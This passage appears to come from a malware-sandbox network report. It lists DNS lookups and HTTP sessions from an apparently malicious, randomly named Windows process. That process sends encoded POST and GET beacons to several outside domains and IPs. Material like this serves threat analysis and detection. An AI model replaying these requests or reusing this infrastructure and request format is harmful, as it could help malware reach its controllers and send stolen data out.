                          Jul 18, 2024 08:18:57.570305109 CEST4973880192.168.2.974.208.46.171
                          Jul 18, 2024 08:18:57.572304964 CEST4973880192.168.2.974.208.46.171
                          Jul 18, 2024 08:18:57.577570915 CEST804973874.208.46.171192.168.2.9
                          Jul 18, 2024 08:19:02.656075954 CEST4973980192.168.2.9154.92.52.196
                          Jul 18, 2024 08:19:02.665448904 CEST8049739154.92.52.196192.168.2.9
                          Jul 18, 2024 08:19:02.665518999 CEST4973980192.168.2.9154.92.52.196
                          Jul 18, 2024 08:19:02.667402983 CEST4973980192.168.2.9154.92.52.196
                          Jul 18, 2024 08:19:02.672384977 CEST8049739154.92.52.196192.168.2.9
                          Jul 18, 2024 08:19:03.581211090 CEST8049739154.92.52.196192.168.2.9
                          Jul 18, 2024 08:19:03.581224918 CEST8049739154.92.52.196192.168.2.9
                          Jul 18, 2024 08:19:03.581233025 CEST8049739154.92.52.196192.168.2.9
                          Jul 18, 2024 08:19:03.581276894 CEST4973980192.168.2.9154.92.52.196
                          Jul 18, 2024 08:19:03.581711054 CEST8049739154.92.52.196192.168.2.9
                          Jul 18, 2024 08:19:03.581717968 CEST8049739154.92.52.196192.168.2.9
                          Jul 18, 2024 08:19:03.581795931 CEST4973980192.168.2.9154.92.52.196
                          Jul 18, 2024 08:19:04.183372974 CEST4973980192.168.2.9154.92.52.196
                          Jul 18, 2024 08:19:05.201809883 CEST4974080192.168.2.9154.92.52.196
                          Jul 18, 2024 08:19:05.206773043 CEST8049740154.92.52.196192.168.2.9
                          Jul 18, 2024 08:19:05.206876993 CEST4974080192.168.2.9154.92.52.196
                          Jul 18, 2024 08:19:05.208739996 CEST4974080192.168.2.9154.92.52.196
                          Jul 18, 2024 08:19:05.213747025 CEST8049740154.92.52.196192.168.2.9
                          Jul 18, 2024 08:19:06.130501986 CEST8049740154.92.52.196192.168.2.9
                          Jul 18, 2024 08:19:06.130536079 CEST8049740154.92.52.196192.168.2.9
                          Jul 18, 2024 08:19:06.130547047 CEST8049740154.92.52.196192.168.2.9
                          Jul 18, 2024 08:19:06.130590916 CEST4974080192.168.2.9154.92.52.196
                          Jul 18, 2024 08:19:06.130780935 CEST8049740154.92.52.196192.168.2.9
                          Jul 18, 2024 08:19:06.130795002 CEST8049740154.92.52.196192.168.2.9
                          Jul 18, 2024 08:19:06.130815983 CEST4974080192.168.2.9154.92.52.196
                          Jul 18, 2024 08:19:06.130836964 CEST4974080192.168.2.9154.92.52.196
                          Jul 18, 2024 08:19:06.714589119 CEST4974080192.168.2.9154.92.52.196
                          Jul 18, 2024 08:19:07.733175993 CEST4974180192.168.2.9154.92.52.196
                          Jul 18, 2024 08:19:07.738199949 CEST8049741154.92.52.196192.168.2.9
                          Jul 18, 2024 08:19:07.738743067 CEST4974180192.168.2.9154.92.52.196
                          Jul 18, 2024 08:19:07.742604971 CEST4974180192.168.2.9154.92.52.196
                          Jul 18, 2024 08:19:07.747450113 CEST8049741154.92.52.196192.168.2.9
                          Jul 18, 2024 08:19:07.747648001 CEST8049741154.92.52.196192.168.2.9
                          Jul 18, 2024 08:19:08.617599010 CEST8049741154.92.52.196192.168.2.9
                          Jul 18, 2024 08:19:08.617615938 CEST8049741154.92.52.196192.168.2.9
                          Jul 18, 2024 08:19:08.617628098 CEST8049741154.92.52.196192.168.2.9
                          Jul 18, 2024 08:19:08.617676973 CEST4974180192.168.2.9154.92.52.196
                          Jul 18, 2024 08:19:08.617760897 CEST8049741154.92.52.196192.168.2.9
                          Jul 18, 2024 08:19:08.617773056 CEST8049741154.92.52.196192.168.2.9
                          Jul 18, 2024 08:19:08.617799044 CEST4974180192.168.2.9154.92.52.196
                          Jul 18, 2024 08:19:08.617834091 CEST4974180192.168.2.9154.92.52.196
                          Jul 18, 2024 08:19:09.246792078 CEST4974180192.168.2.9154.92.52.196
                          Jul 18, 2024 08:19:10.266299009 CEST4974280192.168.2.9154.92.52.196
                          Jul 18, 2024 08:19:10.271214008 CEST8049742154.92.52.196192.168.2.9
                          Jul 18, 2024 08:19:10.271286964 CEST4974280192.168.2.9154.92.52.196
                          Jul 18, 2024 08:19:10.273647070 CEST4974280192.168.2.9154.92.52.196
                          Jul 18, 2024 08:19:10.278814077 CEST8049742154.92.52.196192.168.2.9
                          Jul 18, 2024 08:19:11.204243898 CEST8049742154.92.52.196192.168.2.9
                          Jul 18, 2024 08:19:11.204299927 CEST8049742154.92.52.196192.168.2.9
                          Jul 18, 2024 08:19:11.204312086 CEST8049742154.92.52.196192.168.2.9
                          Jul 18, 2024 08:19:11.204619884 CEST8049742154.92.52.196192.168.2.9
                          Jul 18, 2024 08:19:11.204632998 CEST8049742154.92.52.196192.168.2.9
                          Jul 18, 2024 08:19:11.204643965 CEST8049742154.92.52.196192.168.2.9
                          Jul 18, 2024 08:19:11.204651117 CEST8049742154.92.52.196192.168.2.9
                          Jul 18, 2024 08:19:11.204667091 CEST4974280192.168.2.9154.92.52.196
                          Jul 18, 2024 08:19:11.204817057 CEST4974280192.168.2.9154.92.52.196
                          Jul 18, 2024 08:19:11.205100060 CEST8049742154.92.52.196192.168.2.9
                          Jul 18, 2024 08:19:11.205136061 CEST8049742154.92.52.196192.168.2.9
                          Jul 18, 2024 08:19:11.205142021 CEST8049742154.92.52.196192.168.2.9
                          Jul 18, 2024 08:19:11.205435991 CEST8049742154.92.52.196192.168.2.9
                          Jul 18, 2024 08:19:11.208642006 CEST4974280192.168.2.9154.92.52.196
                          Jul 18, 2024 08:19:11.208857059 CEST4974280192.168.2.9154.92.52.196
                          Jul 18, 2024 08:19:11.212639093 CEST4974280192.168.2.9154.92.52.196
                          Jul 18, 2024 08:19:11.217627048 CEST8049742154.92.52.196192.168.2.9
                          Timestamp | Source Port | Dest Port | Source IP | Dest IP
                          Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                          Jul 18, 2024 08:15:50.040218115 CEST | 192.168.2.9 | 1.1.1.1 | 0x42ac | Standard query (0) | www.gospelstudygroup.org | A (IP address) | IN (0x0001) | false
                          Jul 18, 2024 08:15:55.077122927 CEST | 192.168.2.9 | 1.1.1.1 | 0x2c01 | Standard query (0) | www.valerieomage.com | A (IP address) | IN (0x0001) | false
                          Jul 18, 2024 08:16:10.920753956 CEST | 192.168.2.9 | 1.1.1.1 | 0x9f9 | Standard query (0) | www.instantmailer.cloud | A (IP address) | IN (0x0001) | false
                          Jul 18, 2024 08:16:19.149816990 CEST | 192.168.2.9 | 1.1.1.1 | 0x1931 | Standard query (0) | www.kosherphonestore.com | A (IP address) | IN (0x0001) | false
                          Jul 18, 2024 08:16:32.719049931 CEST | 192.168.2.9 | 1.1.1.1 | 0xa215 | Standard query (0) | www.cwgehkk.store | A (IP address) | IN (0x0001) | false
                          Jul 18, 2024 08:17:07.170677900 CEST | 192.168.2.9 | 1.1.1.1 | 0xcbe8 | Standard query (0) | www.mybodyradar.net | A (IP address) | IN (0x0001) | false
                          Jul 18, 2024 08:17:52.265343904 CEST | 192.168.2.9 | 1.1.1.1 | 0x97ad | Standard query (0) | www.lacemalt.top | A (IP address) | IN (0x0001) | false
                          Jul 18, 2024 08:18:05.844610929 CEST | 192.168.2.9 | 1.1.1.1 | 0xdf25 | Standard query (0) | www.siteblogoficialon.com | A (IP address) | IN (0x0001) | false
                          Jul 18, 2024 08:18:19.469306946 CEST | 192.168.2.9 | 1.1.1.1 | 0x24dd | Standard query (0) | www.mcxright.com | A (IP address) | IN (0x0001) | false
                          Jul 18, 2024 08:18:27.546855927 CEST | 192.168.2.9 | 1.1.1.1 | 0x3ad5 | Standard query (0) | www.amkmos.online | A (IP address) | IN (0x0001) | false
                          Jul 18, 2024 08:18:35.632174015 CEST | 192.168.2.9 | 1.1.1.1 | 0xfc38 | Standard query (0) | www.mg55aa.xyz | A (IP address) | IN (0x0001) | false
                          Jul 18, 2024 08:18:49.375050068 CEST | 192.168.2.9 | 1.1.1.1 | 0xd849 | Standard query (0) | www.lavillitadepapa.com | A (IP address) | IN (0x0001) | false
                          Jul 18, 2024 08:19:02.606623888 CEST | 192.168.2.9 | 1.1.1.1 | 0xd95b | Standard query (0) | www.csstoneoak.com | A (IP address) | IN (0x0001) | false
                          Jul 18, 2024 08:19:16.219278097 CEST | 192.168.2.9 | 1.1.1.1 | 0xf99e | Standard query (0) | www.gzlhysuess.com | A (IP address) | IN (0x0001) | false
                          Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                          Jul 18, 2024 08:15:50.060420990 CEST | 1.1.1.1 | 192.168.2.9 | 0x42ac | Name error (3) | www.gospelstudygroup.org | none | none | A (IP address) | IN (0x0001) | false
                          Jul 18, 2024 08:15:55.321600914 CEST | 1.1.1.1 | 192.168.2.9 | 0x2c01 | No error (0) | www.valerieomage.com | shops.myshopify.com | | CNAME (Canonical name) | IN (0x0001) | false
                          Jul 18, 2024 08:15:55.321600914 CEST | 1.1.1.1 | 192.168.2.9 | 0x2c01 | No error (0) | shops.myshopify.com | | 23.227.38.74 | A (IP address) | IN (0x0001) | false
                          Jul 18, 2024 08:16:11.075464010 CEST | 1.1.1.1 | 192.168.2.9 | 0x9f9 | Name error (3) | www.instantmailer.cloud | none | none | A (IP address) | IN (0x0001) | false
                          Jul 18, 2024 08:16:19.605364084 CEST | 1.1.1.1 | 192.168.2.9 | 0x1931 | No error (0) | www.kosherphonestore.com | www.kosherphonestore.com.cdn.hstgr.net | | CNAME (Canonical name) | IN (0x0001) | false
                          Jul 18, 2024 08:16:19.605364084 CEST | 1.1.1.1 | 192.168.2.9 | 0x1931 | No error (0) | www.kosherphonestore.com.cdn.hstgr.net | | 84.32.84.101 | A (IP address) | IN (0x0001) | false
                          Jul 18, 2024 08:16:33.157087088 CEST | 1.1.1.1 | 192.168.2.9 | 0xa215 | No error (0) | www.cwgehkk.store | | 43.155.26.241 | A (IP address) | IN (0x0001) | false
                          Jul 18, 2024 08:17:07.206608057 CEST | 1.1.1.1 | 192.168.2.9 | 0xcbe8 | No error (0) | www.mybodyradar.net | mybodyradar.net | | CNAME (Canonical name) | IN (0x0001) | false
                          Jul 18, 2024 08:17:07.206608057 CEST | 1.1.1.1 | 192.168.2.9 | 0xcbe8 | No error (0) | mybodyradar.net | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
                          Jul 18, 2024 08:17:07.206608057 CEST | 1.1.1.1 | 192.168.2.9 | 0xcbe8 | No error (0) | mybodyradar.net | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
                          Jul 18, 2024 08:17:52.593069077 CEST | 1.1.1.1 | 192.168.2.9 | 0x97ad | No error (0) | www.lacemalt.top | | 203.161.55.102 | A (IP address) | IN (0x0001) | false
                          Jul 18, 2024 08:18:06.168313980 CEST | 1.1.1.1 | 192.168.2.9 | 0xdf25 | No error (0) | www.siteblogoficialon.com | siteblogoficialon.com | | CNAME (Canonical name) | IN (0x0001) | false
                          Jul 18, 2024 08:18:06.168313980 CEST | 1.1.1.1 | 192.168.2.9 | 0xdf25 | No error (0) | siteblogoficialon.com | | 108.179.193.98 | A (IP address) | IN (0x0001) | false
                          Jul 18, 2024 08:18:19.480040073 CEST | 1.1.1.1 | 192.168.2.9 | 0x24dd | Name error (3) | www.mcxright.com | none | none | A (IP address) | IN (0x0001) | false
                          Jul 18, 2024 08:18:27.559072971 CEST | 1.1.1.1 | 192.168.2.9 | 0x3ad5 | Name error (3) | www.amkmos.online | none | none | A (IP address) | IN (0x0001) | false
                          Jul 18, 2024 08:18:36.080327034 CEST | 1.1.1.1 | 192.168.2.9 | 0xfc38 | No error (0) | www.mg55aa.xyz | | 35.241.34.216 | A (IP address) | IN (0x0001) | false
                          Jul 18, 2024 08:18:49.394747019 CEST | 1.1.1.1 | 192.168.2.9 | 0xd849 | No error (0) | www.lavillitadepapa.com | | 74.208.46.171 | A (IP address) | IN (0x0001) | false
                          Jul 18, 2024 08:19:02.640912056 CEST | 1.1.1.1 | 192.168.2.9 | 0xd95b | No error (0) | www.csstoneoak.com | | 154.92.52.196 | A (IP address) | IN (0x0001) | false
                          Jul 18, 2024 08:19:16.253170013 CEST | 1.1.1.1 | 192.168.2.9 | 0xf99e | Name error (3) | www.gzlhysuess.com | none | none | A (IP address) | IN (0x0001) | false
                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          0 | 192.168.2.9 | 49709 | 23.227.38.74 | 80 | 692 | C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Jul 18, 2024 08:15:55.343617916 CEST | 530 | OUT | GET /c7rq/?mZytyNB=httm3UUwH6NnwSQhbzeVca8kqE5bj6YPstl+OFvVeu4EU857dyc7w4+qhgXRMO7PTzi/X2HMMMtdNC+wv2+swaARuNAxDjOzMu+VfqP1kNqiiXC0Ug==&54D0m=gvohHHH0 HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US,en;q=0.9
                          Host: www.valerieomage.com
                          Connection: close
                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                          Jul 18, 2024 08:15:55.872169018 CEST | 1236 | IN | HTTP/1.1 301 Moved Permanently
                          Date: Thu, 18 Jul 2024 06:15:55 GMT
                          Content-Type: text/html; charset=utf-8
                          Transfer-Encoding: chunked
                          Connection: close
                          X-Sorting-Hat-PodId: 223
                          X-Sorting-Hat-ShopId: 70582403296
                          X-Storefront-Renderer-Rendered: 1
                          location: https://valerieomage.com/c7rq?mZytyNB=httm3UUwH6NnwSQhbzeVca8kqE5bj6YPstl+OFvVeu4EU857dyc7w4+qhgXRMO7PTzi/X2HMMMtdNC+wv2+swaARuNAxDjOzMu+VfqP1kNqiiXC0Ug==&54D0m=gvohHHH0
                          x-redirect-reason: https_required
                          x-frame-options: DENY
                          content-security-policy: frame-ancestors 'none';
                          x-shopid: 70582403296
                          x-shardid: 223
                          vary: Accept
                          powered-by: Shopify
                          server-timing: processing;dur=14;desc="gc:1", db;dur=4, asn;desc="3356", edge;desc="EWR", country;desc="US", pageType;desc="404", servedBy;desc="jq9q", requestID;desc="c3f5f2dd-320e-453b-a4d9-b5695d83d990-1721283355"
                          x-dc: gcp-us-east4,gcp-us-east1,gcp-us-east1
                          x-request-id: c3f5f2dd-320e-453b-a4d9-b5695d83d990-1721283355
                          CF-Cache-Status: DYNAMIC
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Gwioh%2FAPthmTmSzJgxWYy3nuzSEURtWAawZgmwZ5WwVGF0HVKvpwx0OUTJbZeGGnSQjLTNemKqFgY%2Bq4crL9y7qdLda3Y%2FZmIFrayC12DIihTNlS8U5GToX4e0CyXjE8q9g6RmWl"}],"group":"cf-nel","max_age":604800}
                          NEL: {"
                          Jul 18, 2024 08:15:55.872703075 CEST | 332 | IN |
                          Data Ascii: uccess_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=62.999964X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffX-Permitted-Cross-Domain-Policies: noneX-Download-Options: noopen


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          1 | 192.168.2.9 | 49711 | 84.32.84.101 | 80 | 692 | C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Jul 18, 2024 08:16:19.614945889 CEST | 811 | OUT | POST /ktbm/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US,en;q=0.9
                          Accept-Encoding: gzip, deflate, br
                          Host: www.kosherphonestore.com
                          Origin: http://www.kosherphonestore.com
                          Referer: http://www.kosherphonestore.com/ktbm/
                          Content-Length: 196
                          Cache-Control: no-cache
                          Connection: close
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                          Data Ascii: mZytyNB=QA6UYFT+ZhbfrKbFkBiYduPo4/VzHkuUipwcS7NLwpUkEQA/R4Om1XDa3C3szvDkvlCoxb3dlyzw2oimM1qPPd2eHc/O1fwtwam/gRqzRVH14mOVOlhFEIRGhehwk8LmOvzpx8ORZXAi5PMwER0Ichlq0PAoNPv+NJ1RTZkU5PAjdy824WoG3bEWDs5V
                          Jul 18, 2024 08:16:20.078794003 CEST | 1218 | IN | HTTP/1.1 301 Moved Permanently
                          Server: hcdn
                          Date: Thu, 18 Jul 2024 06:16:20 GMT
                          Content-Type: text/html
                          Content-Length: 795
                          Connection: close
                          location: https://www.kosherphonestore.com/ktbm/
                          platform: hostinger
                          content-security-policy: upgrade-insecure-requests
                          alt-svc: h3=":443"; ma=86400
                          x-hcdn-request-id: 5af15a31da118c6f021ed8dfc2e57d84-bos-edge3
                          x-hcdn-cache-status: DYNAMIC
                          x-hcdn-upstream-rt: 0.003
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          2 | 192.168.2.9 | 49712 | 84.32.84.101 | 80 | 692 | C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Jul 18, 2024 08:16:22.150762081 CEST | 835 | OUT | POST /ktbm/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US,en;q=0.9
                          Accept-Encoding: gzip, deflate, br
                          Host: www.kosherphonestore.com
                          Origin: http://www.kosherphonestore.com
                          Referer: http://www.kosherphonestore.com/ktbm/
                          Content-Length: 220
                          Cache-Control: no-cache
                          Connection: close
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                          Data Ascii: mZytyNB=QA6UYFT+ZhbfrqHFniKYMePrkvVzdUuYiu4cS65lwbwkE1k/Q62m43DavS2n3vDvvlOKxb7dlynw2q6mMC+IPN2cL8/M7/wtwam/gRuZRUj15X+VOEgTHIRF3Ohw1sLiOvyOx9jZZSEi5P8wHEALThlswPBGEtSBB7dWZb5wopACTzcopkhdiMExELw99K8n+Lje0x7WllKQfuZTgw==
                          Jul 18, 2024 08:16:22.640935898 CEST | 1218 | IN | HTTP/1.1 301 Moved Permanently
                          Server: hcdn
                          Date: Thu, 18 Jul 2024 06:16:22 GMT
                          Content-Type: text/html
                          Content-Length: 795
                          Connection: close
                          location: https://www.kosherphonestore.com/ktbm/
                          platform: hostinger
                          content-security-policy: upgrade-insecure-requests
                          alt-svc: h3=":443"; ma=86400
                          x-hcdn-request-id: 445d949564f4f5a99b4dd311110ccf0e-bos-edge1
                          x-hcdn-cache-status: DYNAMIC
                          x-hcdn-upstream-rt: 0.001
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          3 | 192.168.2.9 | 49713 | 84.32.84.101 | 80 | 692 | C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Jul 18, 2024 08:16:24.709618092 CEST | 1848 | OUT | POST /ktbm/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US,en;q=0.9
                          Accept-Encoding: gzip, deflate, br
                          Host: www.kosherphonestore.com
                          Origin: http://www.kosherphonestore.com
                          Referer: http://www.kosherphonestore.com/ktbm/
                          Content-Length: 1232
                          Cache-Control: no-cache
                          Connection: close
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                          Data Ascii: mZytyNB= [TRUNCATED]
                          Jul 18, 2024 08:16:25.186525106 CEST | 1218 | IN | HTTP/1.1 301 Moved Permanently
                          Server: hcdn
                          Date: Thu, 18 Jul 2024 06:16:25 GMT
                          Content-Type: text/html
                          Content-Length: 795
                          Connection: close
                          location: https://www.kosherphonestore.com/ktbm/
                          platform: hostinger
                          content-security-policy: upgrade-insecure-requests
                          alt-svc: h3=":443"; ma=86400
                          x-hcdn-request-id: c66a616342a343fd6e933158360fe357-bos-edge2
                          x-hcdn-cache-status: DYNAMIC
                          x-hcdn-upstream-rt: 0.000
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          4 | 192.168.2.9 | 49714 | 84.32.84.101 | 80 | 692 | C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Jul 18, 2024 08:16:27.240205050 CEST | 534 | OUT | GET /ktbm/?mZytyNB=dCS0byWQIzTRzJnjmD3PHvju9v1sRk6AuoksZ/9OoI4xLWFKRKixtkjiz3Hv37r9oCCf0bTqtzy4xv37G1SgXOWwK4/O35gX3K6ytzmMUh+twkmzSQ==&54D0m=gvohHHH0 HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US,en;q=0.9
                          Host: www.kosherphonestore.com
                          Connection: close
                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                          Jul 18, 2024 08:16:27.703633070 CEST | 1236 | IN | HTTP/1.1 301 Moved Permanently
                          Server: hcdn
                          Date: Thu, 18 Jul 2024 06:16:27 GMT
                          Content-Type: text/html
                          Content-Length: 795
                          Connection: close
                          location: https://www.kosherphonestore.com/ktbm/?mZytyNB=dCS0byWQIzTRzJnjmD3PHvju9v1sRk6AuoksZ/9OoI4xLWFKRKixtkjiz3Hv37r9oCCf0bTqtzy4xv37G1SgXOWwK4/O35gX3K6ytzmMUh+twkmzSQ==&54D0m=gvohHHH0
                          platform: hostinger
                          content-security-policy: upgrade-insecure-requests
                          alt-svc: h3=":443"; ma=86400
                          x-hcdn-request-id: e5ef10c779073db1f009a50ae865ef16-bos-edge2
                          x-hcdn-cache-status: MISS
                          x-hcdn-upstream-rt: 0.001
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px
                          Jul 18, 2024 08:16:27.704530001 CEST | 119 | IN |
                          Data Ascii: ;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          5 | 192.168.2.9 | 49715 | 43.155.26.241 | 80 | 692 | C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Jul 18, 2024 08:16:33.167057991 CEST | 790 | OUT | POST /kwl6/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US,en;q=0.9
                          Accept-Encoding: gzip, deflate, br
                          Host: www.cwgehkk.store
                          Origin: http://www.cwgehkk.store
                          Referer: http://www.cwgehkk.store/kwl6/
                          Content-Length: 196
                          Cache-Control: no-cache
                          Connection: close
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                          Data Ascii: mZytyNB=X4cns1+Ys7G53O8wVujvGRJ74w1fYmrpfCxJsGSFB8LVfraUJEWvPr8m8gBaCcDVOTdbx8fsBrTki/OR9hHDcMsmdNcLANOBeksdQOQXkdXWUAVOzxnE/MQyCYOrC4CyexMXddguj6RLHrfUmLHrafV+e+KfhU+Ryvm4BBMeYUabHGYbfKYwCriB2/x4


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          6 | 192.168.2.9 | 49716 | 43.155.26.241 | 80 | 692 | C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Jul 18, 2024 08:16:35.708257914 CEST | 814 | OUT | POST /kwl6/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US,en;q=0.9
                          Accept-Encoding: gzip, deflate, br
                          Host: www.cwgehkk.store
                          Origin: http://www.cwgehkk.store
                          Referer: http://www.cwgehkk.store/kwl6/
                          Content-Length: 220
                          Cache-Control: no-cache
                          Connection: close
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                          Data Ascii: mZytyNB=X4cns1+Ys7G52uswQPjvRhJ43Q1fRGqgfC9JsCjeCOvVcLqUIBivOr8myABfGcCbOTQ7x9zsBr3ki++R8WrAdcs4StcJOtOBeksdQO0tkdPWUVdOwQnDhcRABYOrToC2exMhdc8Aj/VLHu7UnfToVfV0ReLStlPG5smePyQBGF+aJH4FO4RrX8imxY4QQRul6vW4MyoeMT2Jr1FKSg==


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          7 | 192.168.2.9 | 49717 | 43.155.26.241 | 80 | 692 | C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Jul 18, 2024 08:16:38.240376949 CEST | 1827 | OUT | POST /kwl6/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US,en;q=0.9
                          Accept-Encoding: gzip, deflate, br
                          Host: www.cwgehkk.store
                          Origin: http://www.cwgehkk.store
                          Referer: http://www.cwgehkk.store/kwl6/
